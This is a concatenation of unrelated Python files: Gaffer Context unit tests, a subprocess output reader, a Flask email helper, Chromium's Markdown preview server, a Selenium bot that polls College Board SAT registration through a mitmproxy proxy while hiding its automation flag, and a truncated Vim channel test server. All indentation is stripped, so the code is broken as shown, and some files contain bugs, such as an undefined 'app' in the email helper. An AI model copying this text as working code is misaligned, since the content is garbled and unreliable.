c = Gaffer.Context()
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.failUnless( w() is c )
with c :
pass
del c
self.failUnless( w() is None )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.failUnless( isinstance( c, Gaffer.Context ) )
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "~", c.Substitutions.AllSubstitutions & ~c.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "$a/${b}" )
self.assertEqual( c.substitute( "\\", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", c.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "###.3" )
def testSubstitutions( self ) :
c = Gaffer.Context
self.assertEqual( c.substitutions( "a"), c.Substitutions.NoSubstitutions )
self.assertEqual( c.substitutions( "~/something"), c.Substitutions.TildeSubstitutions )
self.assertEqual( c.substitutions( "$a"), c.Substitutions.VariableSubstitutions )
self.assertEqual( c.substitutions( "${a}"), c.Substitutions.VariableSubstitutions )
self.assertEqual( c.substitutions( "###"), c.Substitutions.FrameSubstitutions )
self.assertEqual( c.substitutions( "\#"), c.Substitutions.EscapeSubstitutions )
self.assertEqual( c.substitutions( "${a}.###"), c.Substitutions.VariableSubstitutions | c.Substitutions.FrameSubstitutions )
def testHasSubstitutions( self ) :
c = Gaffer.Context()
self.assertFalse( c.hasSubstitutions( "a" ) )
self.assertTrue( c.hasSubstitutions( "~something" ) )
self.assertTrue( c.hasSubstitutions( "$a" ) )
self.assertTrue( c.hasSubstitutions( "${a}" ) )
self.assertTrue( c.hasSubstitutions( "###" ) )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( "\~" ), "~" )
self.assertEqual( c.substitute( "\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
self.assertTrue( c.hasSubstitutions( "\\" ) ) # must return true, because escaping affects substitution
self.assertTrue( c.hasSubstitutions( "\\\\" ) ) # must return true, because escaping affects substitution
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
if __name__ == "__main__":
unittest.main()
|
proc_reader.py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2019~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from threading import Thread, Lock, Condition
from subprocess import Popen
from queue import Queue
def _read_from_stream(stream, queue: Queue, tag):
def run():
for line in stream:
line: bytes
for x in line.splitlines():
queue.put((tag, x))
queue.put(None)
thread = Thread(target=run)
thread.start()
def yield_from_proc(proc: Popen):
'''
yield each `bytes` line from `stdout` and `stderr`.
``` py
for src, line in yield_from_proc(proc):
if src == 'stdout':
... # line is read from stdout
if src == 'stderr':
... # line is read from stderr
```
'''
assert proc.stdout is not None
assert proc.stderr is not None
queue = Queue()
err_reader = _read_from_stream(proc.stderr, queue, 'stderr')
out_reader = _read_from_stream(proc.stdout, queue, 'stdout')
end_count = 0
while end_count < 2:
item = queue.get()
if item is None:
end_count += 1
else:
yield item
|
email.py | from flask_mail import Message
from flask import current_app
from app import mail
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start() |
md_browser.py | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple Markdown browser for a Git checkout."""
from __future__ import print_function
import SimpleHTTPServer
import SocketServer
import argparse
import codecs
import os
import re
import socket
import sys
import threading
import time
import webbrowser
from xml.etree import ElementTree
THIS_DIR = os.path.realpath(os.path.dirname(__file__))
SRC_DIR = os.path.dirname(os.path.dirname(THIS_DIR))
sys.path.insert(0, os.path.join(SRC_DIR, 'third_party', 'Python-Markdown'))
import markdown
def main(argv):
parser = argparse.ArgumentParser(prog='md_browser')
parser.add_argument('-p', '--port', type=int, default=8080,
help='port to run on (default = %(default)s)')
parser.add_argument('-d', '--directory', type=str, default=SRC_DIR)
parser.add_argument('-e', '--external', action='store_true',
help='whether to bind to external port')
parser.add_argument('file', nargs='?',
help='open file in browser')
args = parser.parse_args(argv)
top_level = os.path.realpath(args.directory)
hostname = '0.0.0.0' if args.external else 'localhost'
server_address = (hostname, args.port)
s = Server(server_address, top_level)
origin = 'http://' + hostname
if args.port != 80:
origin += ':%s' % args.port
print('Listening on %s/' % origin)
thread = None
if args.file:
path = os.path.realpath(args.file)
if not path.startswith(top_level):
print('%s is not under %s' % (args.file, args.directory))
return 1
rpath = os.path.relpath(path, top_level)
url = '%s/%s' % (origin, rpath)
print('Opening %s' % url)
thread = threading.Thread(target=_open_url, args=(url,))
thread.start()
elif os.path.isfile(os.path.join(top_level, 'docs', 'README.md')):
print(' Try loading %s/docs/README.md' % origin)
elif os.path.isfile(os.path.join(args.directory, 'README.md')):
print(' Try loading %s/README.md' % origin)
retcode = 1
try:
s.serve_forever()
except KeyboardInterrupt:
retcode = 130
except Exception as e:
print('Exception raised: %s' % str(e))
s.shutdown()
if thread:
thread.join()
return retcode
def _open_url(url):
time.sleep(1)
webbrowser.open(url)
def _gitiles_slugify(value, _separator):
"""Convert a string (representing a section title) to URL anchor name.
This function is passed to "toc" extension as an extension option, so we
can emulate the way how Gitiles converts header titles to URL anchors.
Gitiles' official documentation about the conversion is at:
https://gerrit.googlesource.com/gitiles/+/master/Documentation/markdown.md#Named-anchors
Args:
value: The name of a section that is to be converted.
_separator: Unused. This is actually a configurable string that is used
as a replacement character for spaces in the title, typically set to
'-'. Since we emulate Gitiles' way of slugification here, it makes
little sense to have the separator charactor configurable.
"""
# TODO(yutak): Implement accent removal. This does not seem easy without
# some library. For now we just make accented characters turn into
# underscores, just like other non-ASCII characters.
value = value.encode('ascii', 'replace') # Non-ASCII turns into '?'.
value = re.sub(r'[^- a-zA-Z0-9]', '_', value) # Non-alphanumerics to '_'.
value = value.replace(u' ', u'-')
value = re.sub(r'([-_])[-_]+', r'\1', value) # Fold hyphens and underscores.
return value
class Server(SocketServer.TCPServer):
def __init__(self, server_address, top_level):
SocketServer.TCPServer.__init__(self, server_address, Handler)
self.top_level = top_level
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
path = self.path
# strip off the repo and branch info, if present, for compatibility
# with gitiles.
if path.startswith('/chromium/src/+/master'):
path = path[len('/chromium/src/+/master'):]
full_path = os.path.realpath(os.path.join(self.server.top_level, path[1:]))
if not full_path.startswith(self.server.top_level):
self._DoUnknown()
elif path in ('/base.css', '/doc.css', '/prettify.css'):
self._DoCSS(path[1:])
elif not os.path.exists(full_path):
self._DoNotFound()
elif path.lower().endswith('.md'):
self._DoMD(path)
elif os.path.exists(full_path + '/README.md'):
self._DoMD(path + '/README.md')
elif path.lower().endswith('.png'):
self._DoImage(full_path, 'image/png')
elif path.lower().endswith('.jpg'):
self._DoImage(full_path, 'image/jpeg')
elif os.path.isdir(full_path):
self._DoDirListing(full_path)
elif os.path.exists(full_path):
self._DoRawSourceFile(full_path)
else:
self._DoUnknown()
def _DoMD(self, path):
extensions = [
'markdown.extensions.def_list',
'markdown.extensions.fenced_code',
'markdown.extensions.tables',
'markdown.extensions.toc',
'gitiles_autolink',
'gitiles_ext_blocks',
'gitiles_smart_quotes',
]
extension_configs = {
'markdown.extensions.toc': {
'slugify': _gitiles_slugify
},
}
contents = self._Read(path[1:])
md = markdown.Markdown(extensions=extensions,
extension_configs=extension_configs,
tab_length=2,
output_format='html4')
has_a_single_h1 = (len([line for line in contents.splitlines()
if (line.startswith('#') and
not line.startswith('##'))]) == 1)
md.treeprocessors['adjust_toc'] = _AdjustTOC(has_a_single_h1)
md_fragment = md.convert(contents).encode('utf-8')
try:
self._WriteHeader('text/html')
self._WriteTemplate('header.html')
self.wfile.write('<div class="doc">')
self.wfile.write(md_fragment)
self.wfile.write('</div>')
self._WriteTemplate('footer.html')
except:
raise
def _DoRawSourceFile(self, full_path):
self._WriteHeader('text/html')
self._WriteTemplate('header.html')
self.wfile.write('<table class="FileContents">')
with open(full_path) as fp:
# Escape html over the entire file at once.
data = fp.read().replace(
'&', '&').replace(
'<', '<').replace(
'>', '>').replace(
'"', '"')
for i, line in enumerate(data.splitlines()):
self.wfile.write(
('<tr class="u-pre u-monospace FileContents-line">'
'<td class="u-lineNum u-noSelect FileContents-lineNum">'
'<a name="%(num)s" '
'onclick="window.location.hash=%(quot)s#%(num)s%(quot)s">'
'%(num)s</a></td>'
'<td class="FileContents-lineContents">%(line)s</td></tr>')
% {'num': i, 'quot': "'", 'line': line})
self.wfile.write('</table>')
self._WriteTemplate('footer.html')
def _DoCSS(self, template):
self._WriteHeader('text/css')
self._WriteTemplate(template)
def _DoNotFound(self):
self._WriteHeader('text/html', status_code=404)
self.wfile.write('<html><body>%s not found</body></html>' % self.path)
def _DoUnknown(self):
self._WriteHeader('text/html', status_code=501)
self.wfile.write('<html><body>I do not know how to serve %s.</body>'
'</html>' % self.path)
def _DoDirListing(self, full_path):
self._WriteHeader('text/html')
self._WriteTemplate('header.html')
self.wfile.write('<div class="doc">')
self.wfile.write('<div class="Breadcrumbs">\n')
self.wfile.write('<a class="Breadcrumbs-crumb">%s</a>\n' % self.path)
self.wfile.write('</div>\n')
for _, dirs, files in os.walk(full_path):
for f in sorted(files):
if f.startswith('.'):
continue
if f.endswith('.md'):
bold = ('<b>', '</b>')
else:
bold = ('', '')
self.wfile.write('<a href="%s/%s">%s%s%s</a><br/>\n' %
(self.path.rstrip('/'), f, bold[0], f, bold[1]))
self.wfile.write('<br/>\n')
for d in sorted(dirs):
if d.startswith('.'):
continue
self.wfile.write('<a href="%s/%s">%s/</a><br/>\n' %
(self.path.rstrip('/'), d, d))
break
self.wfile.write('</div>')
self._WriteTemplate('footer.html')
def _DoImage(self, full_path, mime_type):
self._WriteHeader(mime_type)
with open(full_path) as f:
self.wfile.write(f.read())
f.close()
def _Read(self, relpath, relative_to=None):
if relative_to is None:
relative_to = self.server.top_level
assert not relpath.startswith(os.sep)
path = os.path.join(relative_to, relpath)
with codecs.open(path, encoding='utf-8') as fp:
return fp.read()
def _WriteHeader(self, content_type='text/plain', status_code=200):
self.send_response(status_code)
self.send_header('Content-Type', content_type)
self.end_headers()
def _WriteTemplate(self, template):
contents = self._Read(os.path.join('tools', 'md_browser', template),
relative_to=SRC_DIR)
self.wfile.write(contents.encode('utf-8'))
class _AdjustTOC(markdown.treeprocessors.Treeprocessor):
def __init__(self, has_a_single_h1):
super(_AdjustTOC, self).__init__()
self.has_a_single_h1 = has_a_single_h1
def run(self, tree):
# Given
#
# # H1
#
# [TOC]
#
# ## first H2
#
# ## second H2
#
# the markdown.extensions.toc extension generates:
#
# <div class='toc'>
# <ul><li><a>H1</a>
# <ul><li>first H2
# <li>second H2</li></ul></li><ul></div>
#
# for [TOC]. But, we want the TOC to have its own subheading, so
# we rewrite <div class='toc'><ul>...</ul></div> to:
#
# <div class='toc'>
# <h2>Contents</h2>
# <div class='toc-aux'>
# <ul>...</ul></div></div>
#
# In addition, if the document only has a single H1, it is usually the
# title, and we don't want the title to be in the TOC. So, we remove it
# and shift all of the title's children up a level, leaving:
#
# <div class='toc'>
# <h2>Contents</h2>
# <div class='toc-aux'>
# <ul><li>first H2
# <li>second H2</li></ul></div></div>
for toc_node in tree.findall(".//*[@class='toc']"):
toc_ul = toc_node[0]
if self.has_a_single_h1:
toc_ul_li = toc_ul[0]
ul_with_the_desired_toc_entries = toc_ul_li[1]
else:
ul_with_the_desired_toc_entries = toc_ul
toc_node.remove(toc_ul)
contents = ElementTree.SubElement(toc_node, 'h2')
contents.text = 'Contents'
contents.tail = '\n'
toc_aux = ElementTree.SubElement(toc_node, 'div', {'class': 'toc-aux'})
toc_aux.text = '\n'
toc_aux.append(ul_with_the_desired_toc_entries)
toc_aux.tail = '\n'
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
RegisMaster.py | import threading
import os
from selenium import webdriver
from selenium.webdriver import ChromeOptions
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from datetime import datetime
from playsound import playsound
import time
import random
def os_mitmproxy():
os.chdir('C:/Users/97262/PycharmProjects/RegisMaster')
os.system('mitmdump --mode upstream:127.0.0.1:7890 -s Modify_Response.py')
def refresh_driver(driver):
driver.refresh()
time.sleep(random.randint(3, 8))
driver.refresh()
time.sleep(random.randint(3, 8))
def reboot_main_program(driver):
driver.close()
time.sleep(random.randint(600, 1200))
main_program()
def error001(driver):
html = str(driver.execute_script("return document.documentElement.outerHTML"))
if "We are unable to process your request due to a system error." and "Please try again later." in html:
refresh_driver(driver)
again = WebDriverWait(driver, 120).until(
EC.element_to_be_clickable((By.XPATH, "/html/body/div/div[1]/div[1]/div/div/ul/li/a")))
again.click()
time.sleep(random.randint(5, 15))
try:
iteration(actionRegisterAnother(driver), driver)
iteration(authenticatePage(driver), driver)
iteration(Continue001(driver), driver)
iteration(updateLater(driver), driver)
iteration(agreeTerms(driver), driver)
iteration(Continue002(driver), driver)
iteration(inspect_future_SAT(driver), driver)
except:
reboot_main_program(driver)
def error002(driver):
html = str(driver.execute_script("return document.documentElement.outerHTML"))
if "Please sign in." and "Welcome back." in html:
try:
iteration(error2_login(driver), driver)
iteration(actionRegisterAnother(driver), driver)
iteration(authenticatePage(driver), driver)
iteration(Continue001(driver), driver)
iteration(updateLater(driver), driver)
iteration(agreeTerms(driver), driver)
iteration(Continue002(driver), driver)
iteration(inspect_future_SAT(driver), driver)
except:
reboot_main_program(driver)
def iteration(program, driver):
try:
time.sleep(5)
program
except:
try:
refresh_driver(driver)
program
time.sleep(random.randint(5, 15))
except:
try:
error001(driver)
except:
try:
error002(driver)
except:
reboot_main_program(driver)
def get_collegeboard_website(driver):
driver.get('https://collegereadiness.collegeboard.org/')
time.sleep(random.randint(5, 15))
def login(driver):
sign_in = WebDriverWait(driver, 120).until(
EC.element_to_be_clickable((By.XPATH, "/html/body/div[1]/div[1]/div/div/div/div[1]/div/div[2]/div/a[1]")))
sign_in.click()
user_name = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
"/html/body/div[1]/div[1]/div/div/div[2]/div[3]/div/div/div/div/div/div[1]/div/div[2]/form/div[1]/input")))
user_name.send_keys("USERNAME")
password = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
"/html/body/div[1]/div[1]/div/div/div[2]/div[3]/div/div/div/div/div/div[1]/div/div[2]/form/div[2]/input")))
password.send_keys("PASSWORD")
submit = WebDriverWait(driver, 120).until(EC.element_to_be_clickable(
(By.XPATH, "/html/body/div[1]/div[1]/div/div/div[2]/div[3]/div/div/div/div/div/div[1]/div/div[2]/form/button")))
submit.click()
time.sleep(random.randint(5, 15))
def error2_login(driver):
user_name = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
"/html/body/div/div[3]/div/div/div[1]/div/div/div[2]/div/div/div/div/form/div[1]/div[1]/div[2]/input")))
user_name.send_keys("USERNAME")
password = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
"/html/body/div/div[3]/div/div/div[1]/div/div/div[2]/div/div/div/div/form/div[1]/div[2]/div[2]/input")))
password.send_keys("PASSWORD")
submit = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
"/html/body/div/div[3]/div/div/div[1]/div/div/div[2]/div/div/div/div/form/div[3]/div[1]/button")))
submit.click()
time.sleep(random.randint(5, 15))
def get_collegeboard_registration_website(driver):
driver.get("https://nsat.collegeboard.org/satweb/satHomeAction.action")
def actionRegisterAnother(driver):
register_another = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "actionRegisterAnother")))
register_another.click()
def authenticatePage(driver):
authenticate_page = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "authenticatePage")))
authenticate_page.click()
def Continue001(driver):
continue001 = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "continue")))
continue001.click()
def updateLater(driver):
update_later = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "updateLater")))
update_later.click()
def agreeTerms(driver):
agree_terms = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "agreeTerms")))
agree_terms.click()
def Continue002(driver):
continue002 = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "continue")))
continue002.click()
def inspect_future_SAT(driver):
while True:
WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "cancelBtn")))
html = str(driver.execute_script("return document.documentElement.outerHTML"))
if "There are no available registration dates for the current test year. Please check back later to register for future tests." in html:
with open('LOG.txt', 'a') as LOG:
LOG.write('\n' + datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ": " + "Future SAT NOT Available!")
elif "There are no available registration dates for the current test year. Please check back later to register for future tests." not in html:
while True:
playsound("Alarm01.wav")
time.sleep(random.randint(300, 350))
driver.back()
refresh_driver(driver)
iteration(agreeTerms(driver), driver)
iteration(Continue002(driver), driver)
def main_program():
options = ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-automation'])
options.add_argument('--ignore-certificate-errors')
options.add_argument('--start-maximized')
options.add_argument('--proxy-server=127.0.0.1:8080')
driver = webdriver.Chrome(options=options)
try:
iteration(get_collegeboard_website(driver), driver)
iteration(login(driver), driver)
iteration(get_collegeboard_registration_website(driver), driver)
iteration(actionRegisterAnother(driver), driver)
iteration(authenticatePage(driver), driver)
iteration(Continue001(driver), driver)
iteration(updateLater(driver), driver)
iteration(agreeTerms(driver), driver)
iteration(Continue002(driver), driver)
iteration(inspect_future_SAT(driver), driver)
except:
reboot_main_program(driver)
thread_001 = threading.Thread(target=os_mitmproxy)
thread_002 = threading.Thread(target=main_program)
thread_001.start()
time.sleep(5)
thread_002.start()
|
test_channel.py | #!/usr/bin/python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
while True:
try:
received = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if received == '':
print("=== socket closed ===")
break
print("received: {0}".format(received))
# We may receive two messages at once. Take the part up to the
# matching "]" (recognized by finding "][").
todo = received
while todo != '':
splitidx = todo.find('][')
if splitidx < 0:
used = todo
todo = ''
else:
used = todo[:splitidx + 1]
todo = todo[splitidx + 1:]
if used != received:
